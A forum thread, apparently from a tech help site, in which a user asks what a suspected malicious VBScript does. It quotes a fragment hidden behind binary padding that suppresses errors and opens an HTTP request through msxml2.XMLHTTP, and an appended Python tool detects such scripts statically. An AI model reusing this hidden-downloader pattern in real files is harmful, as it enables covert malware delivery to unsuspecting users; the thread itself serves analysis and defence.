vbscript virus

Status
Not open for further replies.

FGCS

Technical User
Jan 1, 2005
4
US
Hi.

I encountered what I believe to be a malicious script downloaded to my computer. I believe it is written in vbscript. Is there someone who knows this language who is able to tell me what it was trying to do? I don't want to post it here for fear of allowing someone else to use it.

Thanks for any help. This stuff is interesting as I am beginning to see how dangerous the internet can become to the unknowing.

Thank you.
FGCS
 
>Is there someone who knows this language who is able to tell me what it was trying to do? I don't want to post it here for fear of allowing someone else to use it.

You could at least describe the symptoms, and how you know there is a malicious vbscript on your computer.

If you know it's malicious, then I would assume you would have answered your question.
 
Hi Dimandja.

I will give part of the text of the script:

TG!  ¶’ò?²Ï?# ª _þX ! Ò­cöëÏ°ã ª ?    ÿÿÿÿ@  ¾"µÈó\Î­å ª Dw=   †  I  Á<Ž¶ëmÐ?ö ª _þX c €  # m e a n i n g l e s s s h i t i h a d t o p u t h e r e ? ÿ ÿ ÿ h ÿÿÿ#<script language=vbscript> crap = "ÿ!": on error resume next: crap = "ÿ3" : set o = CreateObject("msxml2.XMLHTTP") : crap="ÿB" : o.open "GET","http://

This is half of it. I am just curious as to what is happening.
This file was caught trying to access the internet and stopped by ZoneAlarm and Norton Anti-virus. I want to know what someone was up to and why?

Thanks for any help.
FGCS
 
I also found the site this script was calling. It only has one file on it which is another script.

FGCS
 
This "set o = CreateObject("msxml2.XMLHTTP")" of course means there is an HTTP protocol being set up. Beyond that, it is almost impossible to tell what the end result of all the activity could be -- especially when another VBScript plays middleman.

A spammer could be trying to squat on your machine, or a foundation could be being built for a virus attack.

Someone else may have a better guess.
 
May I suggest that you go to and read some of the offerings. At the bottom of the page check out "Know Your Enemy - 21 July, 2000," "Know Your Enemy: III - 27 March, 2000," and "Know Your Enemy: A Forensics Analysis - 23 May, 2000."

Dimandja's hit the X ring dead center; most likely an invasion of some sort is underway, the danger is in what you have not discovered. At this point any comments as to whom or why would be nothing more than a guess, however the fact remains that something tried to establish a socket.
 
Thanks guys. It turns out I had 6 trojan viruses on my computer. On Monday someone used my e-mail address to send out spam. I thought I was safe by virus scanning via a network by mapping the c drive. Is it possible to do a thorough virus scan through a network?

Anyway, I am educating myself.

Thanks again.
 
I would recommend that you do a layered approach to virus protection. I run virus protection on each PC in our network, every server in our network, on our mail server checking every incoming mail. I also block most attachment types at our firewall and run antispamming software on our mail server. The layered approach is what is recommended and it will protect everything to a much higher degree than any one solution.

Dan
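
A static triage sketch for the kind of file discussed in this thread, added here as an example and not written by any of the posters: it finds a VBScript block buried in binary padding and reports the HTTP COM objects it creates, whether it suppresses errors, and any request it opens, without executing anything. The ProgIDs other than msxml2.XMLHTTP, the function name `triage`, and the sample bytes are assumptions of this example.

```python
import re

# ProgIDs of COM HTTP clients; the thread's sample uses the first one.
# The rest of this set is an assumption of this example, not from the thread.
HTTP_PROGIDS = {"msxml2.xmlhttp", "microsoft.xmlhttp",
                "msxml2.serverxmlhttp", "winhttp.winhttprequest.5.1"}

# A VBScript <script> tag anywhere in the bytes; an unclosed block runs to EOF.
SCRIPT_RE = re.compile(
    rb"<script[^>]*language\s*=\s*[\"']?vbscript[\"']?[^>]*>(.*?)(?:</script>|\Z)",
    re.I | re.S)
CREATE_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.I)
OPEN_RE = re.compile(r'\.open\s+"(\w+)"\s*,\s*"([^"]*)', re.I)
ON_ERROR_RE = re.compile(r"on\s+error\s+resume\s+next", re.I)


def triage(raw: bytes) -> list[dict]:
    """Return one finding per embedded VBScript block found in raw bytes."""
    findings = []
    for m in SCRIPT_RE.finditer(raw):
        # latin-1 maps every byte to a character, so padding never raises.
        body = m.group(1).decode("latin-1")
        progids = {p.lower() for p in CREATE_RE.findall(body)}
        findings.append({
            "offset": m.start(),  # bytes of non-script padding before the tag
            "http_objects": sorted(progids & HTTP_PROGIDS),
            "suppresses_errors": bool(ON_ERROR_RE.search(body)),
            "requests": OPEN_RE.findall(body),  # (method, URL as far as present)
        })
    return findings


# Constructed sample: junk bytes followed by a fragment shaped like the one in
# the thread. The URL is cut off in the post and is left cut off here.
SAMPLE = (b"TG!\x00\xff\xfe\x12 padding \xff\xff\xff#"
          b'<script language=vbscript> crap = "x": on error resume next: '
          b'set o = CreateObject("msxml2.XMLHTTP") : o.open "GET","http://')

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A non-zero `offset` together with an HTTP object and error suppression is the combination seen in the posted fragment: script text hidden behind padding that makes a web request and hides any failure.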
 